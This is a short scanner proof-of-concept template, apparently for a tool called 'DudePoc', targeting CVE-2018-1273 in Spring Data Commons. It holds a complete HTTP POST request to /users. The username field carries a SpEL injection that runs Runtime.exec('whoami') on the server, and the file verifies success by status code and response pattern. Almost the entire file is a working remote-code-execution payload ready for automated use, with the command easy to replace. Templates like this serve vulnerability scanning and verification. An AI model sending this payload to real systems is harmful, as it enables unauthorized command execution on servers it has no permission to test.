<DudePoc_Name>CVE_2018_1273</DudePoc_Name>
<DudePoc_Description></DudePoc_Description>
<DudePoc_SetHeader>
POST /users HTTP/1.1
Host: $<AttackHost>$
Content-type: application/x-www-form-urlencoded
Content-Length: 0
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("whoami")]
</DudePoc_SetData>
<DudePoc_VerifyStatusCode>500</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>^(?=.*?(?:Invalid|property)).*?$</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
